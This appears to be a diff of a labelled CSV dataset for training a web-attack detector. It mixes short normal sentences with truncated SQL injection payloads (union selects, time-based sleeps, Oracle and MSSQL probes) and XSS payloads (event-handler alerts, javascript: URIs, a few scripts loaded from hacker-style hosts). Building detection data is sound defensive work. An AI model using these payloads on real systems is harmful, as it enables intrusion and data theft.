null,null,null,null,null#",2,SQLi,16150 -1 ) as ptxw where 9873 = 9873,2,SQLi,21342 -1' in boolean mode ) or ( select 9173 from ( selec,2,SQLi,22001 --8911%' or 9323 = 9323#,2,SQLi,15631 -"<progress ondblclick=""alert(1)"">test</progress>",1,XSS,7367 -1' ) ) ) and 7756 = dbms_utility.sqlid_to_sqlhash ,2,SQLi,17850 -"On mobile, select the playlist you want to share, ",0,normal,25846 -"<tt onmouseout=""alert(1)"">test</tt>",1,XSS,3566 -"<style>@keyframes x{}</style><strike style=""animat",1,XSS,5841 -"1"" ) ) ) and ( select 9067 from ( select count ( *",2,SQLi,16668 -select,0,normal,26623 -"1"" ) as rovd where 3764 = 3764 and elt ( 4249 = 42",2,SQLi,12862 -( select ( case when ( 4232 = 4232 ) then ( select,2,SQLi,18985 -"<link oncontextmenu=""alert(1)"">test</link>",1,XSS,8912 -"<header onmouseout=""alert(1)"">test</header>",1,XSS,4152 -1 rlike ( select * from ( select ( sleep ( 5 ) ) ),2,SQLi,16076 -( select 2412 = ( 'qqpjq'|| ( select case 2412 whe,2,SQLi,14272 -1' ) ) and 2401 = 4693 and ( ( 'ssrm' = 'ssrm,2,SQLi,14131 -"{""id"":null,""firstName"":""Yingxin"",""lastName"":""Li"",""",0,normal,27164 -"1' ) ) ) procedure analyse ( extractvalue ( 5840,c",2,SQLi,20463 -"1%"" ) ) and 2006 = 2006",2,SQLi,13503 -ORDER BY 10,2,SQLi,10314 -"select * from generate_series ( 1431,1431,case whe",2,SQLi,20561 -"He not merely did nothing of the kind, but on the ",0,normal,26115 -"-7313"" ) where 3606 = 3606 union all select 3606#",2,SQLi,13205 -<svg id=x onfocusin=alert(1)>,1,XSS,4322 -"<wbr onbeforecopy=""alert(1)"" contenteditable>test<",1,XSS,3162 -"<meter onmouseout=""alert(1)"">test</meter>",1,XSS,2631 -The role of Select midfield powerhouse is filled a,0,normal,25382 -"<legend onmouseup=""alert(1)"">test</legend>",1,XSS,3175 -<svg><bgsound onload=alert(1)></bgsound>,1,XSS,2566 -Select mail.,0,normal,24701 -1' or 7427 = dbms_pipe.receive_message ( chr ( 116,2,SQLi,17588 -select,0,normal,26588 -"Then, you can select an option to mute that user.",0,normal,25338 -1 ) ) ) or sleep ( 5 ) #,2,SQLi,17001 -"<style>@keyframes x{}</style><element style=""anima",1,XSS,3115 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10834 -Select your trip.,0,normal,25020 -"-4580"" or 1570 = convert ( int, ( select char ( 11",2,SQLi,19113 -1' and 7528 = 2894 and 'qoyw' = 'qoyw,2,SQLi,13921 -1' ) and 4386 = utl_inaddr.get_host_address ( chr ,2,SQLi,20751 -"<xmp onmouseover=""alert(1)"">test</xmp>",1,XSS,2461 --7231 ) ) union all select 7639#,2,SQLi,14915 -select * from users where id = 1. union select nul,2,SQLi,11811 -Why would a supernatural force use a videotape to ,0,normal,25121 -"<tr draggable=""true"" ondragend=""alert(1)"">test</tr",1,XSS,8093 -1%' ) ) or 4411 = ( select count ( * ) from sysuse,2,SQLi,17742 --3304' ) ) order by 1--,2,SQLi,20176 -"<isindex onpaste=""alert(1)"" contenteditable>test</",1,XSS,7799 -%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshado,1,XSS,8998 -"-9934"" ) or 5023 = ctxsys.drithsx.sn ( 5023, ( chr",2,SQLi,12887 -select,0,normal,26616 -<style>:target {color:red;}</style><base id=x styl,1,XSS,7777 -"1' ) ) ) and elt ( 9501 = 8427,8427 ) and ( ( ( 'a",2,SQLi,14202 -1 ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||c,2,SQLi,17975 -"1', ( select ( case when ( 8382 = 8382 ) then 1 el",2,SQLi,15490 -"{""id"":null,""name"":""ShayminLand Forme""}",0,normal,27226 -<plaintext onpointerout=alert(1)>XSS</plaintext>,1,XSS,3141 -1%' and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ,2,SQLi,12473 -<style>:target {transform: rotate(180deg);}</style,1,XSS,5339 -Select wrap.,0,normal,24693 -select ( case when ( 5423 = 7706 ) then 5423 else ,2,SQLi,16932 -"<object draggable=""true"" ondragend=""alert(1)"">test",1,XSS,7119 -"<article onmouseout=""alert(1)"">test</article>",1,XSS,6938 -"1"" ) ) ) and ( select * from ( select ( sleep ( 5 ",2,SQLi,16411 -"1' ) ) as sxpk where 5524 = 5524 and row ( 6237,74",2,SQLi,17452 -<style>:target {color: red;}</style><option id=x s,1,XSS,3919 -<style>:target {color: red;}</style><strike id=x s,1,XSS,5530 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5399 -#ERROR!,2,SQLi,11361 -"1"" ) and 6510 = ( select count ( * ) from sysusers",2,SQLi,14381 -"1%' union all select null,null,null,null,null,null",2,SQLi,17286 -1' rlike ( select ( case when ( 7689 = 7689 ) then,2,SQLi,22157 -AND 3516=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(1,2,SQLi,10741 -"1 and elt ( 4249 = 4249,7259 ) # lwyo",2,SQLi,16822 -"<style>@keyframes slidein {}</style><svg style=""an",1,XSS,8321 -1%' ) ) ) and 5556 = ( select count ( * ) from all,2,SQLi,15700 -AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11113 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5270 -"<command oncontextmenu=""alert(1)"">test</command>",1,XSS,1862 -""",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0",2,SQLi,10892 +a' --,2,SQLi,11052 +"-9772' or 5023 = ctxsys.drithsx.sn ( 5023, ( chr (",2,SQLi,14788 +1' ) ) or 8421 = ( select count ( * ) from generat,2,SQLi,18103 +"{""id"":null,""name"":""""}",0,normal,26754 +1 ) as tykp where 6851 = 6851,2,SQLi,15795 +1%' and 7756 = dbms_utility.sqlid_to_sqlhash ( ( c,2,SQLi,12382 +"<article draggable=""true"" ondragenter=""alert(1)"">t",1,XSS,7856 +"In making such comparisons, it is always desirable",0,normal,26007 +He decided to order a vegetarian meal.,0,normal,22924 +"-9558"" where 7497 = 7497 or ( 2539 = 6484 ) *6484-",2,SQLi,13019 +"-5478"" ) where 4100 = 4100 or 4747 = dbms_utility.",2,SQLi,14876 +1%' ) ) ) rlike ( select * from ( select ( sleep (,2,SQLi,14262 +"1%"" ) ) ) or 8156 = ( select count ( * ) from gene",2,SQLi,19292 +<style>:target {color: red;}</style><plaintext id=,1,XSS,4629 +"select * from generate_series ( 3180,3180,case whe",2,SQLi,17383 +"In select cities, you can also order flowers from ",0,normal,25989 +Select the ideal gift for someone special.,0,normal,24249 +"<svg><script href=""data:text/javascript,alert(1)"" ",1,XSS,155 +1 ) ) or pg_sleep ( __TIME__ ) --,2,SQLi,11471 +"{""id"":null,""firstName"":""Lay Sien"",""lastName"":""Ong""",0,normal,26971 +"<style>@keyframes x{}</style><image style=""animati",1,XSS,8058 +Delete outdated posts from your social media.,0,normal,22958 +"<table draggable=""true"" ondragstart=""alert(1)"">tes",1,XSS,8929 +"<script>import('data:text/javascript,alert(1)')</s",1,XSS,157 +"-4954%"" ) or 5244 = 4832",2,SQLi,22447 +"<var onkeydown=""alert(1)"" contenteditable>test</va",1,XSS,3087 +Sort books.,0,normal,23089 +"<!--#exec cmd=""/bin/echo '<SCR'""--><!--#exec cmd=""",1,XSS,1554 +"1%' ) and updatexml ( 3393,concat ( 0x2e,0x7171706",2,SQLi,13396 +`'><script>\x0Djavascript:alert(1)</script>,1,XSS,557 +<style>@keyframes slidein {}</style><noframes styl,1,XSS,2150 +select * from users where id = 1 + @`\` union sele,2,SQLi,11990 +"<a href=""\xE2\x80\x88javascript:javascript:alert(1",1,XSS,496 +Let's decide where to go for a spa retreat.,0,normal,23818 +<script onblur=alert(1) tabindex=1 id=x></script><,1,XSS,2323 +"-1106' ) ) union all select 2855,2855,2855,2855,28",2,SQLi,17299 +<svg><animate xlink:href=#xss attributeName=href f,1,XSS,152 +"{""id"":null,""name"":""Snorlax""}",0,normal,26772 +Where can I select a class for my fitness routine?,0,normal,23758 +"{""id"":null,""name"":""thee""}",0,normal,26770 +"<EMBED SRC=""http://hacker.com/xss.swf"" AllowScript",1,XSS,1366 +"1"" ) where 5491 = 5491",2,SQLi,18125 +"1%"" ) ) or 4240 = ( select 4240 from pg_sleep ( 5 ",2,SQLi,19388 +"-8940"" ) or 4144 = ( select upper ( xmltype ( chr ",2,SQLi,18802 +select ( case when ( 5322 = 6200 ) then 5322 else ,2,SQLi,15699 +"1%"" ) ) ) ( select ( case when ( 4587 = 4587 ) the",2,SQLi,19270 +<content onblur=alert(1) tabindex=1 id=x></content,1,XSS,3723 +"<caption oncut=""alert(1)"" contenteditable>test</ca",1,XSS,7130 +javascript:alert()//</title></style></textarea></n,1,XSS,9536 +"select sleep ( 5 ) and ""oivc"" like ""oivc",2,SQLi,17275 +"<nextid onmouseout=""alert(1)"">test</nextid>",1,XSS,5474 +"-7083 union all select 7705,7705,7705,7705,7705#",2,SQLi,19588 +"-8477' union all select 2517,2517,2517--",2,SQLi,22261 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,4826 +1'|| ( select 'ydvg' from dual where 7108 = 7108,2,SQLi,15482 +"1"" ) ) and 2006 = 2006",2,SQLi,12656 +"1%' ) ) ) union all select null,null,null,null,nul",2,SQLi,16730 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4139 +Up to 30% off select smart and electronic door loc,0,normal,25215 +-1879%' ) ) or 3038 = 3038,2,SQLi,19575 +1' ) rlike sleep ( 5 ) and ( 'qsub' like 'qsub,2,SQLi,18610 +-7859 ) as ipdg where 4413 = 4413 or 9323 = 9323#,2,SQLi,12391 +"<ruby oncopy=""alert(1)"" contenteditable>test</ruby",1,XSS,2123 +"<li onpaste=""alert(1)"" contenteditable>test</li>",1,XSS,6861 +žscriptualert(EXSSE)ž/scriptu,1,XSS,993 +"1"" ) ) as oiqr where 4073 = 4073 or 8156 = ( selec",2,SQLi,13276 +"( select 2768 from ( select count ( * ) ,concat ( ",2,SQLi,15874 +"1"" ) ) as vtad where 3653 = 3653 procedure analyse",2,SQLi,16152 +1'+ ( select kgon where 9014 = 9014 ( select ( cas,2,SQLi,21340 +"1%"" rlike ( select ( case when ( 7689 = 7689 ) the",2,SQLi,21999 +select ( case when ( 6276 = 6276 ) then 6276 else ,2,SQLi,15633 +<script onpointerout=alert(1)>XSS</script>,1,XSS,7369 +1' ) where 5286 = 5286,2,SQLi,17852 +"On the current Nook Tablet, tap open the Apps icon",0,normal,25843 +"<style>@keyframes x{}</style><legend style=""animat",1,XSS,3568 +"<template draggable=""true"" ondragenter=""alert(1)"">",1,XSS,5843 +"1%"" ) ) ) waitfor delay '0:0:5' and ( ( ( ""%"" = """,2,SQLi,16670 +select,0,normal,26620 +1 ) as msat where 1267 = 1267,2,SQLi,12864 +"1%' ) ) ) union all select null,null,null--",2,SQLi,18987 +"<tbody draggable=""true"" ondrag=""alert(1)"">test</tb",1,XSS,8914 +"<em oncopy=""alert(1)"" contenteditable>test</em>",1,XSS,4154 +"1' ) union all select null,null,null,null,null,nul",2,SQLi,16078 +if ( 9431 = 6730 ) select 9431 else drop function ,2,SQLi,14274 +"1%"" ) ) and 6414 = ( select count ( * ) from rdb$f",2,SQLi,14133 +"{""id"":null,""firstName"":""Stephan"",""lastName"":""Toh"",",0,normal,27162 +1' and 7756 = dbms_utility.sqlid_to_sqlhash ( ( ch,2,SQLi,20465 +waitfor delay '0:0:5' and ( ( ( '%' = ',2,SQLi,13505 +ORDER BY 12,2,SQLi,10316 +( select ( case when ( 6714 = 8872 ) then 1 else 6,2,SQLi,20559 +-4171' ) union all select 6136#,2,SQLi,20874 +"-5644"" ) ) ) or make_set ( 9354 = 9354,7185 ) and ",2,SQLi,13207 +<dialog onpointerenter=alert(1)>XSS</dialog>,1,XSS,4324 +<textarea autofocus onfocusin=alert(1)>test</texta,1,XSS,3164 +"<dd onbeforepaste=""alert(1)"" contenteditable>test<",1,XSS,2632 +The service has a handful of cable networks in sel,0,normal,25379 +<noframes id=x tabindex=1 ondeactivate=alert(1)></,1,XSS,3177 +<acronym onpointerenter=alert(1)>XSS</acronym>,1,XSS,2567 +Select receive.,0,normal,24698 +-5861' ) or 1581 = 2611 and ( 'mvjh' like 'mvjh,2,SQLi,17590 +select,0,normal,26585 +There are a lot of strollers out there that will h,0,normal,25335 +"1"" where 1100 = 1100",2,SQLi,17003 +<aside onpointerleave=alert(1)>XSS</aside>,1,XSS,3116 +sleep(__TIME__)#,2,SQLi,10836 +Select your fail.,0,normal,25017 +-8051 ) or 5903 = ( 'qqpjq'|| ( select case 5903 w,2,SQLi,19115 +"select count ( * ) from generate_series ( 1,500000",2,SQLi,13923 +Select a recipe for a special meal.,0,normal,24052 +"<style>@keyframes slidein {}</style><q style=""anim",1,XSS,2462 +1'+ ( select 'gtqr' where 5660 = 5660,2,SQLi,14917 +select * from users where id = 1 or \.<1 union sel,2,SQLi,11813 +Will the Whips try to strangle independence on the,0,normal,25118 +"<style>@keyframes x{}</style><q style=""animation-n",1,XSS,8095 +"1"" ) where 4180 = 4180 or char ( 68 ) ||char ( 69 ",2,SQLi,17744 +1 ) where 5651 = 5651,2,SQLi,20178 +"<button onmousemove=""alert(1)"">test</button>",1,XSS,7801 +-alert(1)//,1,XSS,9000 +1' ) ) as ypgz where 8704 = 8704,2,SQLi,12889 +Select the perfect angle.,0,normal,24338 +"<summary draggable=""true"" ondragenter=""alert(1)"">t",1,XSS,7779 +1'|| ( select 'jlka' where 5436 = 5436 or 4915 = (,2,SQLi,14204 +"1"" ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ) ",2,SQLi,17977 +"-9860%"" union all select 6996,6996,6996,6996,6996,",2,SQLi,15492 +"{""id"":null,""firstName"":""Wong"",""lastName"":""Qun Jie""",0,normal,27224 +"<isindex draggable=""true"" ondrag=""alert(1)"">test</",1,XSS,3143 +-6514 ) ) as pbgg where 6841 = 6841 union all sele,2,SQLi,12475 +"<param onkeydown=""alert(1)"" contenteditable>test</",1,XSS,5341 +1' ) ) ) or sleep ( 5 ) and ( ( ( 'bmnf' like 'bmn,2,SQLi,20941 +1 and sleep ( 5 ) # qcyj,2,SQLi,16934 +"<time onmouseout=""alert(1)"">test</time>",1,XSS,7121 +"<col onmouseleave=""alert(1)"">test</col>",1,XSS,6940 +1'|| ( select 'kgjk' where 3530 = 3530 and 3580 = ,2,SQLi,16413 +"-6086"" union all select 8700,8700,8700,8700--",2,SQLi,17454 +"<picture onmouseover=""alert(1)"">test</picture>",1,XSS,3921 +<var onpointerover=alert(1)>XSS</var>,1,XSS,5532 +"<kbd onmousemove=""alert(1)"">test</kbd>",1,XSS,5401 +email=' WAITFOR DELAY '0:0:5'--,2,SQLi,11363 +"-3492"" where 4094 = 4094 or 3440 = cast ( ( chr ( ",2,SQLi,14383 +"-7378' union all select 2071,2071,2071,2071,2071,2",2,SQLi,17288 +1 ) where 3671 = 3671,2,SQLi,22155 +UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHA,2,SQLi,10743 +1' ) ) as qswu where 6377 = 6377,2,SQLi,16824 +"<time oncontextmenu=""alert(1)"">test</time>",1,XSS,8323 +1 where 6100 = 6100 and 2716 = ( select count ( * ,2,SQLi,15702 +AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11115 +"<input onmouseout=""alert(1)"">test</input>",1,XSS,5272 +"<style>@keyframes x{}</style><title style=""animati",1,XSS,1863 +"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0",2,SQLi,10894 "{""id"":null,""firstName"":""Netalie"",""lastName"":""Angel",0,normal,27440 -"-2384%' ) ) union all select 2467,2467,2467,2467#",2,SQLi,17489 -"<listener event=""load"" handler=""#y"" xmlns=""http://",1,XSS,9226 +1 ) and 5196 = 9002,2,SQLi,17491 +"<maction actiontype=""statusline#http://google.com""",1,XSS,9228 <style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,2 -"<keygen onpaste=""alert(1)"" contenteditable>test</k",1,XSS,2707 --9821 ) as qqrm where 7152 = 7152 union all select,2,SQLi,13328 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10692 -<iframe src=%22404%22 onload=%22frames[0].document,1,XSS,9197 -"<datalist onbeforecut=""alert(1)"" contenteditable>t",1,XSS,6958 -"<header onbeforecopy=""alert(1)"" contenteditable>te",1,XSS,2156 -"iif ( 7036 = 2370,1,1/0 )",2,SQLi,21605 -<object onerror=alert(1) data=1 type=image/gif>,1,XSS,4012 -"For starters, you'll get Priority Pass Select airp",0,normal,26173 +"<textarea draggable=""true"" ondragenter=""alert(1)"">",1,XSS,2708 +1' ) rlike sleep ( 5 ) and ( 'tslp' = 'tslp,2,SQLi,13330 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10694 +<iframe src=%22404%22 onload=%22top.frames[0].docu,1,XSS,9199 +"<content draggable=""true"" ondragleave=""alert(1)"">t",1,XSS,6960 +<style>:target {transform: rotate(180deg);}</style,1,XSS,2157 +-2817%' ) or 8255 = 3841--,2,SQLi,21603 +"<small draggable=""true"" ondrag=""alert(1)"">test</sm",1,XSS,4014 +"For this reason, select toys that don't have small",0,normal,26170 "<a href=""\x06javascript:javascript:alert(1)"" id=""f",1,XSS,535 -"select * from users where id = 1 or "";{"" or 1 = 1 ",2,SQLi,11963 -"<nav onmouseenter=""alert(1)"">test</nav>",1,XSS,5824 --1587' ) or 8339 = 5540,2,SQLi,16970 -"select * from users where id = 1 or "" ) ( "" = 1 or",2,SQLi,11876 -"-2319 union all select 5068,5068,5068#",2,SQLi,12353 -1'|| ( select 'ymac' from dual where 9268 = 9268 o,2,SQLi,15324 -Search records where valid.,0,normal,23311 -"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,21335 -Plant flowers outside.,0,normal,22778 -<samp id=x tabindex=1 onfocus=alert(1)></samp>,1,XSS,8684 -"onerror=alert()1 a=""",1,XSS,9744 -1' in boolean mode ) and char ( 111 ) ||char ( 77 ,2,SQLi,14261 -"-2325 ) union all select 4692,4692,4692,4692#",2,SQLi,15125 -<br/><hr/>jAvascript:alert('Top Page Location: '+d,1,XSS,9089 -if ( 3593 = 3779 ) select 3593 else drop function ,2,SQLi,16563 -"<h1 onbeforepaste=""alert(1)"" contenteditable>test<",1,XSS,6465 -Select restaurant.,0,normal,24536 -"-2046' ) union all select 6668,6668--",2,SQLi,18301 -"<address ondblclick=""alert(1)"">test</address>",1,XSS,8108 -"-6406%' ) or 1570 = convert ( int, ( select char (",2,SQLi,14905 -"<menu onkeyup=""alert(1)"" contenteditable>test</men",1,XSS,1911 -Where's the cottage?,0,normal,23558 -"1"" ) where 2367 = 2367",2,SQLi,21265 -select ( case when ( 8642 = 6049 ) then 1 else 864,2,SQLi,17518 -Up to 30% off select Solar Panels and Electrical E,0,normal,25214 -"1' in boolean mode ) and elt ( 9630 = 4765,4765 ) ",2,SQLi,21998 -"<br size=\""&{alert('XSS')}\"">",1,XSS,1318 -"<svg onmouseout=""alert(1)"">test</svg>",1,XSS,4369 -<style onpointerup=alert(1)>XSS</style>,1,XSS,8314 -"-4695' ) ) ) union all select 5844,5844,5844,5844,",2,SQLi,20215 -1' where 7504 = 7504 and char ( 120 ) ||char ( 106,2,SQLi,21013 -"-5014"" ) or 2724 in ( ( char ( 113 ) +char ( 113 )",2,SQLi,13855 -<textarea onbeforecopy=alert(1) autofocus>XSS</tex,1,XSS,6081 -"1"" ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +c",2,SQLi,21383 -"<option onmouseover=""alert(1)"">test</option>",1,XSS,2602 -"<marquee onclick=""alert(1)"">test</marquee>",1,XSS,6569 -"-6184"" ) ) or 2724 in ( ( char ( 113 ) +char ( 113",2,SQLi,18558 -word1,0,normal,26537 -"1 ) ) ) union all select null,null,null,null,null-",2,SQLi,12747 -1' ) ) rlike ( select ( case when ( 3876 = 2077 ) ,2,SQLi,19990 -1 ) ) as aeat where 1007 = 1007 and 5556 = ( selec,2,SQLi,13277 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,7996 -"<div id=""67""><!DOCTYPE x [ <!ATTLIST img xmlns CDA",1,XSS,9143 -"<link onmousemove=""alert(1)"">test</link>",1,XSS,3769 -"<html onmouseover=""alert(1)"">test</html>",1,XSS,5078 -Controller will launch in closed beta for select c,0,normal,26265 -<button onDataSetComplete=javascript:alert(1)>,1,XSS,9600 -"<header oncut=""alert(1)"" contenteditable>test</hea",1,XSS,4632 -Select the perfect font for the design.,0,normal,24184 +declare @s varchar ( 200 ) select @s = 0x776169746,2,SQLi,11965 +"<meta draggable=""true"" ondragleave=""alert(1)"">test",1,XSS,5826 +"1' ) ) ) union all select null,null,null,null,null",2,SQLi,16972 +"admin"" or ""1"" = ""1""#",2,SQLi,11878 +"-9656"" union all select 8735,8735--",2,SQLi,12355 +"-9997' union all select 9347,9347,9347,9347,9347,9",2,SQLi,15326 +Join tables where necessary.,0,normal,23308 +"{""id"":null,""name"":""Lobomon""}",0,normal,26924 +Select a chair.,0,normal,22775 +"<p oncut=""alert(1)"" contenteditable>test</p>",1,XSS,8686 +<input type=text value=“XSS”>,1,XSS,9746 +"-5945' ) ) ) union all select 4266,4266,4266,4266,",2,SQLi,14263 +1%' ) and 6537 = dbms_pipe.receive_message ( chr (,2,SQLi,15127 +<deTAiLs/open/oNtoGGle=confirm()>,1,XSS,9091 +if ( 8995 = 9787 ) select 8995 else drop function ,2,SQLi,16565 +<data onpointermove=alert(1)>XSS</data>,1,XSS,6467 +Select menu.,0,normal,24533 +1' and 2316 = 7236,2,SQLi,18303 +<option onblur=alert(1) tabindex=1 id=x></option><,1,XSS,8110 +"1"" ) as tnux where 4888 = 4888 rlike ( select * fr",2,SQLi,14907 +"<wbr oncut=""alert(1)"" contenteditable>test</wbr>",1,XSS,1912 +Where's the beach house?,0,normal,23555 +"-8654' union all select 7190,7190,7190,7190,7190#",2,SQLi,22143 +1'|| ( select 'flbv' where 7451 = 7451 and 4595 = ,2,SQLi,17520 +"{""id"":null,""name"":""Hare""}",0,normal,27023 +-8999' ) ) ) or 6872 = 6872 and ( ( ( 'jare' = 'ja,2,SQLi,21996 +<scrscriptipt>alert(1)</scrscriptipt>,1,XSS,1319 +"<hr oncontextmenu=""alert(1)"">test</hr>",1,XSS,4371 +"<div draggable=""true"" ondragstart=""alert(1)"">test<",1,XSS,8316 +"-2382%' ) union all select 8885,8885,8885,8885,888",2,SQLi,20217 +Select toppings carefully.,0,normal,24423 +"make_set ( 7729 = 7729,1 )",2,SQLi,13857 +"<li oncopy=""alert(1)"" contenteditable>test</li>",1,XSS,6083 +"select count ( * ) from all_users t1,all_users t2,",2,SQLi,21381 +<style>@keyframes slidein {}</style><option style=,1,XSS,2603 +"<style draggable=""true"" ondragend=""alert(1)"">test<",1,XSS,6571 +1'|| ( select 'ywfo' from dual where 4168 = 4168 r,2,SQLi,18560 +"{""id"":null,""name"":""again""}",0,normal,27544 +"-8080"" ) as nlos where 8917 = 8917 union all selec",2,SQLi,12749 +1 ) ) ) union all select null#,2,SQLi,19992 +"1' ) and elt ( 4249 = 4249,7259 )",2,SQLi,13279 +<details onpointermove=alert(1)>XSS</details>,1,XSS,7998 +"<div id=""69""><card xmlns=""http://www.wapforum.org/",1,XSS,9145 +"<marquee onmouseenter=""alert(1)"">test</marquee>",1,XSS,3771 +"<label oncut=""alert(1)"" contenteditable>test</labe",1,XSS,5080 +"Crate & Barrel: 230% off select dining furniture, ",0,normal,26262 +<button onDeactivate=javascript:alert(1)>,1,XSS,9602 +<shadow onblur=alert(1) tabindex=1 id=x></shadow><,1,XSS,4634 +"1"" ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ( ",2,SQLi,21140 <img src=validimage.png onloadstart=alert(1)>,1,XSS,241 -"-9247' ) ) ) union all select 6964,6964,6964,6964,",2,SQLi,16054 -"-2111' union all select 1061,1061,1061--",2,SQLi,15425 -The modus operandi is to turn the plant out of its,0,normal,25408 -1 ) ) as rbcf where 1053 = 1053,2,SQLi,21209 -1 ) and ( 7557 = 1711 ) *1711 and ( 5157 = 5157,2,SQLi,22273 -or 1 = 1 or '' = ',2,SQLi,11462 -"<style>@keyframes x{}</style><template style=""anim",1,XSS,7466 -"<samp onmousemove=""alert(1)"">test</samp>",1,XSS,1868 -1'+ ( select 'ixvd' where 4772 = 4772 and char ( 1,2,SQLi,21202 -1 ) ) as lkqx where 6468 = 6468 or ( select * from,2,SQLi,18953 -"<wbr onmouseout=""alert(1)"">test</wbr>",1,XSS,2522 -"1',iif ( 6625 = 6625,1,1/0 )",2,SQLi,22462 -"<canvas onbeforepaste=""alert(1)"" contenteditable>t",1,XSS,1821 -"<hgroup draggable=""true"" ondragstart=""alert(1)"">te",1,XSS,2411 -<discard onpointerout=alert(1)>XSS</discard>,1,XSS,8244 -"<style>@keyframes x{}</style><img style=""animation",1,XSS,6638 -1' ) and 4380 = 5851 and ( 'cxcl' = 'cxcl,2,SQLi,16577 -<address id=x tabindex=1 onfocus=alert(1)></addres,1,XSS,4566 -"1%"" ) ) and 9660 = ( select count ( * ) from all_u",2,SQLi,14918 -1' where 3900 = 3900 and 3715 in ( ( char ( 113 ) ,2,SQLi,13930 -"With the video open, select ""Edit"" from the top me",0,normal,25111 -"<audio onkeypress=""alert(1)"" contenteditable>test<",1,XSS,6392 -<small id=x tabindex=1 ondeactivate=alert(1)></sma,1,XSS,2119 -"union (select NULL, NULL, NULL, (select @@version)",2,SQLi,10051 -"<aside onbeforepaste=""alert(1)"" contenteditable>te",1,XSS,3780 -Save $50 on select Fitbit trackers on Amazon See D,0,normal,25730 -<textarea onpaste=alert(1) autofocus></textarea>,1,XSS,4962 -"<ul oncopy=""alert(1)"" contenteditable>test</ul>",1,XSS,2810 -"<a href=""\x17javascript:javascript:alert(1)"" id=""f",1,XSS,499 -select * from users where id = 1 *1 union select n,2,SQLi,11446 -><img src=x onerror=window.open('https://www.googl,1,XSS,919 -"1"" ) ) or 5286 = ( select count ( * ) from all_use",2,SQLi,13391 -select pg_sleep ( 5 ) and ( 'aydg' = 'aydg,2,SQLi,13265 -"<source onmousemove=""alert(1)"">test</source>",1,XSS,4285 -Join the team.,0,normal,22836 -<script>Object.prototype.documentMode = 9 </script,1,XSS,229 -Select triple-check.,0,normal,24570 -"-6798%"" ) ) ) or 3440 = cast ( ( chr ( 113 ) ||chr",2,SQLi,22367 -<style>:target {color: red;}</style><footer id=x s,1,XSS,2742 -1' ) rlike sleep ( 5 ) and ( 'tslp' = 'tslp,2,SQLi,13330 -select * from users where id = 1 | |1 union select,2,SQLi,11704 -"-7868' in boolean mode ) union all select 5117,511",2,SQLi,14349 -<script> var+x+=+showModelessDialog+(this); alert(,1,XSS,9272 -"1%"" union all select null,null,null,null,null,null",2,SQLi,22044 -AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11114 -"<legend onmousemove=""alert(1)"">test</legend>",1,XSS,6002 -"<frame onmouseleave=""alert(1)"">test</frame>",1,XSS,4898 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,5584 -"1"" and 8148 = like ( 'abcdefg',upper ( hex ( rando",2,SQLi,18750 -<i onpointerdown=alert(1)>XSS</i>,1,XSS,7868 -"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,21094 -"<iframe xmlns=""#"" src=""javascript:alert(1)""></ifra",1,XSS,1129 -Hormel said its products launched this week in sel,0,normal,26086 -&&SLEEP(5)#,2,SQLi,10401 -perl -e &#039;print \&quot;&lt;IMG SRC=java\0scrip,1,XSS,1568 -ORDER BY 26#,2,SQLi,10299 -%3cscript%3ealert('XSS')%3c/script%3e,1,XSS,1707 -"<ins onbeforecopy=""alert(1)"" contenteditable>test<",1,XSS,3154 -1 or pg_sleep(5)--,2,SQLi,10365 -""" ) or true--",2,SQLi,11524 -<bdi id=x tabindex=1 ondeactivate=alert(1)></bdi><,1,XSS,7300 -Where to find the table?,0,normal,23373 -"{""id"":null,""firstName"":""Ryan Low Low"",""lastName"":""",0,normal,27082 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,6241 -<img src=x onerror=prompt(1)>//INJECTX,1,XSS,9825 -<header onpointerdown=alert(1)>XSS</header>,1,XSS,2926 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10491 -"{""id"":null,""name"":""Dugong""}",0,normal,27278 --7505' ) ) as lqvw where 8565 = 8565 or 6872 = 687,2,SQLi,12445 -<rt onpointerup=alert(1)>XSS</rt>,1,XSS,2722 -<wbr id=x tabindex=1 onfocusin=alert(1)></wbr>,1,XSS,7510 -Select a book for your bookshelf.,0,normal,24201 -select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,21921 -The company's management did not give satisfaction,0,normal,25469 -1' or char ( 117 ) ||char ( 111 ) ||char ( 105 ) |,2,SQLi,13800 -1'+ ( select 'drvv' where 5622 = 5622 and 3580 = (,2,SQLi,15155 -Create a list.,0,normal,22859 -"1"" ) as pydh where 3407 = 3407 and 6510 = ( select",2,SQLi,14784 -"1' ) ) and elt ( 3053 = 9778,9778 ) and ( ( 'yfaa'",2,SQLi,16345 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10833 -"select pg_sleep ( 5 ) and ""zhsc"" = ""zhsc",2,SQLi,15750 -<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>,1,XSS,9054 -"<div STYLE=""width: expression(document.vulnerable=",1,XSS,1506 -"<noembed 